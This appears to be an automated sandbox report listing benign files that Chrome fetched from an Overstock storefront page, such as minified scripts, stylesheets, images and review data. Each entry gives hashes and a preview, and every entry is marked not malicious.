                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[172],{7154:function(e){function t(){return e.exports=t=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(this,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports},6479:function(e,t,r){var n=r(7316);e.exports=function(e,t){if(null==e)return{};var r,i,o=n(e,t);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);for(i=0;i<a.length;i++)r=a[i],t.indexOf(r)>=0||Object.prototype.propertyIsEnumerable.call(e,r)&&(o[r]=e[r])}return o},e.exports.__esModule=!0,e.exports.default=e.exports},7316:function(e){e.exports=function(e,t){if(null==e)return{};var r,n,i={},o=Object.keys(e);for(n=0;n<o.length;n++)r=o[n],t.indexOf(r)>=0||(i[r]=e[r]);return i},e.exports.__esModule=!0,e.exports.default=e.exports},2543:function(e,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35640
                                                                                                                                                                                    Entropy (8bit):7.982145503858993
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:TB68y6CtaqL3mn8mZyK3qkzvkwfsreaJDmNqyw4v:T0taxpM4zwe+DmNq6v
                                                                                                                                                                                    MD5:95016CE85A8B7FC0663B9CAA2CDF5151
                                                                                                                                                                                    SHA1:67E5C4FA2B9A2F9FCD1550BE4B37520FE8662C65
                                                                                                                                                                                    SHA-256:B53281243E83D43A55C7641144277A885FDD9E2B8E4FB669948D1E13AA1520A1
                                                                                                                                                                                    SHA-512:C3779092612B4239BCE80CF97CFB808EE355F0C935855DE99CF513293863F59722C1314F5E7787AF59ADC9EBCA1A8EE2A0BA8BEB7046AF6AB13E831C1877D793
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10282024-MOPS-1_SWB_Desktop.jpg?v=1730145898&width=650
                                                                                                                                                                                    Preview:RIFF0...WEBPVP8X....(......m..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*..n.>9..C.!..KE. ......dQ..W[.%...;....*....e~K.O..O./.>W.G..{.......?....9....Y.........?........#...............=...../........p~.{........?._.?..|.....I...................._...........?.{..3......+.g....._I......)........././........@?....E............A....._.).....k............?z.-.....G.......xs.../.....<.......W.o........~f|.{O............O...}......O....`?..........W......xl~.._..'....?......K...w...Or.P...?...../.....?..z...........o.g..u.....=}....Q......R.5._2.#.AF...^.uH(..|....../.z.. ._
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.742661756378496
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfsv3Af18lLOq1zALlJ6LUiqfktZLRDWLvwLa1zALNXQ4L4/GTL4OLV:YBFWlLjzALKLSktZLQLoLizALNXVL4eR
                                                                                                                                                                                    MD5:7B1D2549CF9AFB2A29A4146B18BE9067
                                                                                                                                                                                    SHA1:E06318111D3210AAAE10C1A50931B5D1724790BD
                                                                                                                                                                                    SHA-256:7CBC0D5E5344E002E5D1B07268F3E139BF30B77A7D082D57CDCE829108B83086
                                                                                                                                                                                    SHA-512:4C6021D403F9FAB1A984C9E582E3001B804C24A3185CC42F8E5A183229DE040F6D72482A57D7CBFF3F86E9E43D14F3488AC9FF8819E6B66F94996769FBC5229D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/38113419%2C34117129%2C39718442%2C36804334%2C9463624%2C38404515%2C36501643%2C28022197%2C36176187%2C31428689/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"34117129","rollup":{"average_rating":4.53,"rating_count":45,"review_count":45,"answered_questions":0}},{"page_id":"38113419","rollup":{"average_rating":4.27,"rating_count":15,"review_count":15,"answered_questions":0}},{"page_id":"36176187","rollup":{"average_rating":4.82,"rating_count":22,"review_count":22,"answered_questions":0}},{"page_id":"36501643","rollup":{"average_rating":4.37,"rating_count":41,"review_count":41,"answered_questions":0}},{"page_id":"36804334","rollup":{"average_rating":4.24,"rating_count":17,"review_count":17,"answered_questions":0}},{"page_id":"38404515","rollup":{"average_rating":3.8,"rating_count":5,"review_count":5,"answered_questions":0}},{"page_id":"39718442","rollup":{"average_rating":4.73,"rating_count":15,"review_count":15,"answered_questions":0}},{"page_id":"9463624","rollup":{"average_rating":4.75,"rating_count":177,"review_count":177,"answered_questions":0}},{"page_id":"28022197","rollup":{"average_rating":4.76
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):45078
                                                                                                                                                                                    Entropy (8bit):4.770569902289332
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:mlF13tuF24QFBF6TF5hFLF6w9kFAFY6FDjIFQFcwFA4wWuQ+FxZ+F6wFAFRF7gFN:q/tuM4QfoTHhRbiy9u63CCuQ+DZ+9Gno
                                                                                                                                                                                    MD5:B4109405FDDFC078637A0EACAE82CFAE
                                                                                                                                                                                    SHA1:6F749292C0F4B8DA6DB2CC5FC054342E58DEB324
                                                                                                                                                                                    SHA-256:D0CB51B1445822450AF3246CA283173B4CA24FCFDDF868AAB063AC9F2309D3CD
                                                                                                                                                                                    SHA-512:8EFDE0BA77352E6B8611AB3157BE0130D3A3A522FDEAB865E06E9981993134DB68EF4361D0658E4219535CB7BB48F290C518C9D6CCB51A633DC901C69F7E60FD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/freeGiftLogicv1.css
                                                                                                                                                                                    Preview::root{. --DEFAULT-BORDER-COLOR: #9EBADC;. --DEFAULT-BG-COLOR: #4B556C;. --BLACK-COLOR: #000000;. --WHITE-COLOR: #FFFFFF;.}../* reusable css classes starts */...underline{. text-decoration: underline !important;.}..no-underline{. text-decoration: none;.}..no-underline > .underline{. text-decoration: underline !important;.}..font-weight-medium{. font-weight: 600;.}../* reusable css classes ends */.....gfgFreeGiftMsgContainer {. display: grid;. grid-template-columns: 0.2fr 1fr;. grid-template-rows: 1fr;. font-size: 14px;. box-shadow: 0 2px 4px 0px rgba(0, 0, 0, 0.2), 0 2px 10px 0 rgba(0, 0, 0, 0.19);. grid-gap: 10px;. padding: 10px 8px;. border-radius: 4px;. line-height: normal !important;.}...gfgFreeGiftMsgIcon {. width: 80px;. height: 80px;..}....gfgProductPageWrapperV2 {. margin-bottom: 5px;. line-height: normal;.}...cart__ctas {. display: grid !important;.}...gfgVolDiscountContainer{. /* display: grid;. grid-gap:
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):32
                                                                                                                                                                                    Entropy (8bit):4.054229296672174
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:3oMm2C2Y:LO
                                                                                                                                                                                    MD5:5BB011FCC873A9AE56F0A4D5988AF09E
                                                                                                                                                                                    SHA1:C6200E26563E81628E67EC1E9685C0994C351DBD
                                                                                                                                                                                    SHA-256:874E4A927E06795573365A0E54EE080F0D92FDF00617FD476F7D0E53EE8BDFB5
                                                                                                                                                                                    SHA-512:35422413017DC267A9EB89BE9B13724B7F2F0D209E596007684B777CEB1D1DF0FD2963D489C911C2D4BBCA57759B2CC924A4BEC6EC3864F959EE964F15913A8C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnTBeBq957POxIFDQPwgdo=?alt=proto
                                                                                                                                                                                    Preview:ChQKEg0D8IHaGgQICRgBGgUImgEYAg==
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):595
                                                                                                                                                                                    Entropy (8bit):4.677732062182454
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:w+dB1Eo/O+d/Z6u191OIIw+d3ZR919FwV1RYq1Y8+PHVKlHFnXNYHNMTns+:NL1Eu9/2F3cjRVAP1KllWtMp
                                                                                                                                                                                    MD5:AE0AC625028C776A1BBB6FAAF603B69D
                                                                                                                                                                                    SHA1:96DCC6CAFBD98A6134407DAD79AA72E2F8769F38
                                                                                                                                                                                    SHA-256:C95916B88A9A93FA9A8EC7EED9D4F66F6CAEC7142BD47C40C7F9587DDC9C5B3B
                                                                                                                                                                                    SHA-512:A49B3D029FC9BD4AE76AB12C8B4A6506CA0E881D8C62A71609EA84C6864058C3C0C5B437458D7CE84BC40625F3138FFC70EF68FBEBB78B77EC3ECC54884E8A5A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/animate-on-scroll.css?v=116194678796051782541730157903
                                                                                                                                                                                    Preview:.cc-animate-enabled [data-cc-animate] {. opacity: 0;.}.@media (prefers-reduced-motion) {. .cc-animate-enabled [data-cc-animate] {. animation: none !important;. opacity: 1 !important;. }.}..no-js .cc-animate-enabled [data-cc-animate] {. animation: none !important;. opacity: 1 !important;.}..@keyframes fade-in {. 0% {. opacity: 0;. }. 100% {. opacity: 1;. }.}..cc-animate-enabled [data-cc-animate=""].cc-animate-in,..cc-animate-enabled .fade-in.cc-animate-in {. animation: fade-in calc(var(--aos-animate-duration, 1s) * 0.8) 0.3s cubic-bezier(0.39, 0.575, 0.565, 1) both;.}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 56x56, segment length 16, progressive, precision 8, 1610x894, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):37612
                                                                                                                                                                                    Entropy (8bit):7.7763211258772005
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:waum6OgvrJ13ImdbH3y2V5NyEeCiQIpZaTLT/vwGLuhvepA3y/vVdQIyie3hrF:waSOglJdbH3y2cEiGTvpLmCX9duPF
                                                                                                                                                                                    MD5:5928779FED3E8E1EF97EEE030316D2AA
                                                                                                                                                                                    SHA1:E20393FA120BE6AF29A0B9F41AA717B5818A52E3
                                                                                                                                                                                    SHA-256:F18CECAA98A7CDEB5BB4FCA651D6B88F5124FA94B5A9B06C8F7A401FE12553C4
                                                                                                                                                                                    SHA-512:28B5CF378092133A3EE702B6F26AC72D380A3EB3E06F8CDCF4CADA2A0B4C35F88CEDAF47177FD094BD349B848120AF19DF6957833C33D0955F84875272CDE9DD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF.....8.8......................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C........~.J.."..........3.......................................................................................................~.[s....1"..\...qz...Q.h".-j.h......2....H..H....... $......$...............1$..!".:.g(..................................:9.5....V...j)z.'..y.....L.^....h.m.R...$BD$BD$...."@.@.....!0..$@....!0... *K1.1.1.;9@.....................................f}<.......Ef....~f..I.h....kE...b...JI$$......... . ..............H.......1$.IY...%.P7.........................................>.7.I"........^....BB..k..Z.5kV..%$.HL.BD$D...H.... ......!"..$@.........H...7..........................................c....m.V.<.+..p...E....nM.k-h.M.I..@.."....H.... ."$...! ..D........H....j.BD...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5276)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32253
                                                                                                                                                                                    Entropy (8bit):5.001362234997696
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MiQyo/tdqZbm4IDX+MQtrmstM7x4m0dMTvmxMcmQQIpjt07VF7ziWP:M3ydiDX+MQtrmstM7ym0dMbmxMcmQQI4
                                                                                                                                                                                    MD5:1DFA49B30A2390C5611E0AE2FCC6643D
                                                                                                                                                                                    SHA1:2C51BB22C3F1540DCF954F7DC94C485A3E3538AB
                                                                                                                                                                                    SHA-256:B446CD010673031A7CACB2A370C15183A67F9B66419C0C6CDA5007E7026C65F2
                                                                                                                                                                                    SHA-512:EE75F29A6060FAFF6B19CFDC44605FD3CF1BF75F18104D552C7601DEB41EAB8376617EBE2C2CD2C2DF7ED92E99337273A7900CE87D23FCB3CB2B35F9AB70D71E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:import{storeFrontRequest}from"./storefrontapi.js";import{handleize,formatMoney}from"./helpers.js";if(!customElements.get("featured-product-banner")){class CollectionFeaturedProduct extends HTMLElement{constructor(){super(),this.productId=this.getProductIdFromUrl(),this.variantId=this.getVariantIdFromUrl(),this.sectionId=this.dataset.sectionId,this.isDesktop=theme.mediaMatches.lg,this.heading=this.dataset.heading,this.subheading=this.dataset.subheading,this.recoTitle=this.dataset.recoTitle,this.recoLimit=this.dataset.recoLimit,this.shopPayMin=this.dataset.shopPayMin,this.shopPayMax=this.dataset.shopPayMax}async connectedCallback(){if(!this.productId){this.hideProductBanner(),console.warn("No featuredProduct found in query parameters");return}try{const product=await this.fetchProductById(this.productId);product?(this.renderProduct(product),this.renderRecommendations(product),this.resizeHandler=this.resizeHandler.bind(this,product),window.addEventListener("on:debounced-resize",this.resize
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (52230), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):52230
                                                                                                                                                                                    Entropy (8bit):5.402491914545316
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:T7YLPlDg5xLnzax89tl4isUeWu1bJjwvblf9oiob5Y6USEqS:Y6nax89EisseJsvVOilSG
                                                                                                                                                                                    MD5:ABE0CE9EEA042AFEABAF933BC573360D
                                                                                                                                                                                    SHA1:0E8555A2840ADC7DC898C74700917744ABED1E5D
                                                                                                                                                                                    SHA-256:98F0F892623CB9AF03889B3DCB58DBCD6E476B419DEAC537DC00EA22D8B48FE5
                                                                                                                                                                                    SHA-512:F9F491041286351E9DE89FD875A667465C5363481A25D089D05F7DEDA658C1B36C9B5F90FC60859477E5CD7FBA0B98351956AC28F0894B108790AF9B67D514FF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";var e,t,n,r={2759:function(e,t,n){var r=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=t.clientConfig=void 0;var o=r(n(9713));function a(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function i(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?a(Object(n),!0).forEach((function(t){(0,o.default)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):a(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var u={API_URL:{development:"https://api-integration.test.overstock.com/",test:"https://api-integration.test.overstock.com/",prod:"https://api.bedbathandbeyond.com/"},ASSET_URL:{development:"https://images-common.test.overstock.com/static/pag
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1489)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):210833
                                                                                                                                                                                    Entropy (8bit):5.494126945983759
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:8oat+KbTz+tOyPIvqYsfIRqOSgwOpP3kpQx8l0stdZ/I:8cAyySFysd/I
                                                                                                                                                                                    MD5:D86EC6E8CF19DC7EE57DDC71ED1A5ADF
                                                                                                                                                                                    SHA1:730A172232C5B0A83D733B2B7FD0440BA3FB206A
                                                                                                                                                                                    SHA-256:A5C41349086521A1E7D8861AF57F8F2F83921A76B45EE33894CFC16B6C279F6F
                                                                                                                                                                                    SHA-512:0DEB15ADA2CFAB8C81BED1995D485FD70C0583DA74B8642110777726FE837D642CB28EA1E067ADA80A08B88820183FDE01C2556C2C7FB1B5E1663E72C188C5A3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/web-sdk/5.1/braze.min.js
                                                                                                                                                                                    Preview:/*.* Braze Web SDK v5.1.1.* (c) Braze, Inc. 2024 - http://braze.com.* License available at https://github.com/braze-inc/braze-web-sdk/blob/master/LICENSE.* Compiled on 2024-02-13.*/.(function(){(function(b,a){if("function"===typeof define&&define.amd)define([],a);else if("object"===typeof module&&module.exports){var e = a();module.exports=e;module.exports.default=e}else if(b.braze){var d=a(),c;for(c in d)b.braze[c]=d[c]}else b.braze=a()})("undefined"!==typeof self?self:this,function(){var brazeInterface={};var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function r(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function ca(a){if(!(a instanceof Array)){a=r(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.var da="function"==typeof Object.create?Object.create:function(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32117)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51984
                                                                                                                                                                                    Entropy (8bit):5.4192491243703405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:JIF0sxaJJciEVY+7ODTPLhRM8WVQpESqQKsxtLQzavRsLadl0W8M5F4H:ahItZrMRWpEWHQKiqKH
                                                                                                                                                                                    MD5:DB49357F923EC899C9EF90B7DEF907B8
                                                                                                                                                                                    SHA1:480D28152D77EAB20F5992EC0AB5AF15960FFC91
                                                                                                                                                                                    SHA-256:80E528BE853EAC23AF2454534897CA9536B1D3D04AA043B042F34879A3C111C8
                                                                                                                                                                                    SHA-512:88607E0B9619FA59D47B036F0BDF571CD996701774BD7AAF075B63C38590FFD6315551CF361126D4F7E5379A6D635FE3C11283D9560419040254CD217BC544ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var t=function(t){var e={exports:{}};return t.call(e.exports,e,e.exports),e.exports},e=function(t){return function(){var e=t.apply(this,arguments);return new Promise((function(t,r){function n(i,o){try{var a=e[i](o),s=a.value}catch(t){return void r(t)}if(!a.done)return Promise.resolve(s).then((function(t){n("next",t)}),(function(t){n("throw",t)}));t(s)}return n("next")}))}},r=function(t){return t&&t.__esModule?t:{default:t}},n=t((function(t){var e={}.toString;t.exports=function(t){return e.call(t).slice(8,-1)}})),i=t((function(t){var e=t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=e)})),o=t((function(t){var e="__core-js_shared__",r=i[e]||(i[e]={});t.exports=function(t){return r[t]||(r[t]={})}})),a=t((function(t){var e=0,r=Math.random();t.exports=function(t){return"Symbol(".concat(void 0===t?"":t,")_",(++e+r).toString(36))}})),s=t((function(t){var e=o("wks"),r=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65444)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):437138
                                                                                                                                                                                    Entropy (8bit):4.96222517648304
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:dPMo0WsOreOtBbiBZc4LveerH7/PfcEWzExKjoNfrQYWRtXk72o4V:dPMo3YwYWRtXk72oG
                                                                                                                                                                                    MD5:BE6A019E0609E3FD5715FD8DFE428C39
                                                                                                                                                                                    SHA1:2A23C8B5406310D076AA25A1DF098B2F658F3066
                                                                                                                                                                                    SHA-256:4E1220C5B994AB293FD025A117221366376A2590399C176033F4A91ED76859F8
                                                                                                                                                                                    SHA-512:97A9FA2EE6C2BF4F2B0ABAB02F79C51C6E04EC3AD772232BD42FA58A58F26878F0A12D92B69CA0A97C62710BF55F1B375731B4FAADEC9FC7722DD64E88766BCC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/css/styles.css
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.@charset "UTF-8";.p-w-r{display:block!important}.p-w-r a,.p-w-r abbr,.p-w-r acronym,.p-w-r address,.p-w-r applet,.p-w-r article,.p-w-r aside,.p-w-r audio,.p-w-r b,.p-w-r big,.p-w-r blockquote,.p-w-r body,.p-w-r canvas,.p-w-r caption,.p-w-r center,.p-w-r cite,.p-w-r code,.p-w-r dd,.p-w-r del,.p-w-r details,.p-w-r dfn,.p-w-r div,.p-w-r dl,.p-w-r dt,.p-w-r em,.p-w-r embed,.p-w-r fieldset,.p-w-r figcaption,.p-w-r figure,.p-w-r footer,.p-w-r form,.p-w-r h1,.p-w-r h2,.p-w-r h3,.p-w-r h4,.p-w-r h5,.p-w-r h6,.p-w-r header,.p-w-r hgroup,.p-w-r html,.p-w-r i,.p-w-r iframe,.p-w-r img,.p-w-r ins,.p-w-r kbd,.p-w-r label,.p-w-r legend,.p-w-r li,.p-w-r mark,.p-w-r menu,.p-w-r nav,.p-w-r object,.p-w-r ol,.p-w-r output,.p-w-r p,.p-w-r pre,.p-w-r q,.p-w-r ruby,.p-w-r s,.p-w-r samp,.p-w-r section,.p-w-r small,.p-w-r span,.p-w-r strike,.p-w-r strong,.p-w-r sub,.p-w-r summary,.p-w-r sup,.p-w-r table,.p-w-r tbody,.p-w-r td,.p-w-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2159), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2159
                                                                                                                                                                                    Entropy (8bit):5.187883475890047
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:6KLxP8Njis5O3sqw0TjnHuBAz3Cs0JFf2EwM5ccR5P/4hx95Ts7W:RVqjrTaqADCvFf2vsXvPAnL+W
                                                                                                                                                                                    MD5:5737D20E84D62E43284A5575D810A012
                                                                                                                                                                                    SHA1:0261F4E3A0CCD50821BC00B3C81040A2990ABCE0
                                                                                                                                                                                    SHA-256:7C37E17BFEB054B199C90965D335D1DA2455954BB849B754262C1BF2F98594F9
                                                                                                                                                                                    SHA-512:7C17F7335E0AEA6B2A0D0AE3F725187208EDEC9587DFAE1906D01D9B6ECCCD2F03DF67D8EE693DEDECC9C11DB2FBD34277D600A4D8D8981A088FACCB8B5B1B18
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-product-script.min.js?product_click=true&product_view=true&shop_domain=a37a28-2.myshopify.com&shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function r(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function o(e){const t=100;window.setTimeout(function(){if(r()!==null&&r().getUser()){e()}else{o(e)}},t)}function s(e,o,n){fetch(e+".js").then(e=>e.json()).then(e=>{var t={id:e.id,title:e.title,price:e.price,vendor:e.vendor,images:e.images,shopify_storefront:n};r().logCustomEvent(o,t);r().requestImmediateDataFlush()})}function n(){const e=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-product-script")));const t=new URLSearchParams(e.search);return Object.fromEntries(t.entries())}function u(e){const t=e.lastIndexOf("/")+1;const o=e.indexOf("?")>0?e.indexOf("?"):e.length;return e.substring(t,o)}function c(e,t,o,n,r,i){productName=u(t);const c=JSON.parse(localStorage.getItem(o)||"{}");lastEventTimeForProduct=c[productNa
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (55677)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):144274
                                                                                                                                                                                    Entropy (8bit):5.60784601692848
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:2g3I8CpCbrSoU/6fyi23p7fRCfSthQ1wum3eqpt:2g2pCbrSoe6fyiE93uE
                                                                                                                                                                                    MD5:FE87F1DC1C42EBE03D5EFF6253644CD7
                                                                                                                                                                                    SHA1:E7AD36DFB1458D0E4D70880B8CEC277E4C312C68
                                                                                                                                                                                    SHA-256:A36DB08CF2DB6F6D695F147DD976D0FC3F36F001B22EE0890FAA113D3CAA41BF
                                                                                                                                                                                    SHA-512:B01A6F1813F64B912FF2058B32B559992185858067D8FB63D2642F0248958F932EF12D6F7A55FDAD1B77D426AB589389F0C9F0D9A13F8C8203D0C22369A33D0B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/VaultedPayment.CwzLhAxg.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-PayPalExpressPaymentMethod.zHPDBYl8.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","useIsOriginatedFromShop.7toB9y1y.js","useShowShopPayOptin.cjqea2Mu.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css"])))=>i.map(i=>d[i]);.import{e as k,c0 as le,at as Y,a as t,a8 as Q,ac as p,e5 as nt,jp as xe,az as F,bZ as Vn,b_ as Na,fm as on,hU as wt,pn as Fa,he as Ba,h as T,I as pe,bS as Ke,po as Pr,a6 as Et,aa as G,ab as ee,jw as Oe,pp as Da,E as Lt,lq as de,y as L,bf as Se,jJ as Ar,js as Sr,m as Ce,eU as qa,je as ln,av as qe,a3 as Ve,a4 as ie,jq as rt,mk as wr,gj as Er,bv as Ra,al as cn,v as at,J as Ie,A as ce,pq as Oa,dF as Mr,fD as Tt,pr as Va,g7 as za,lk as dn,T as K,ps as Ha,pt as Wa,pu as Ya,ia as zn,ej as Ga,lY as $a,lV as un,pv as Ua,mM as ja,pw as Za,et as Ka,a5 as xt,mA as Xa,d as X,fB as Ir,bT as Nt,a7 as re,aG as Xe,V as ae,mB as mn,D as ue,px as Ue,q as V,c7 as kr,c8 as Ja,py as Qa,cq as es,aO as pn,ae as st,bJ as
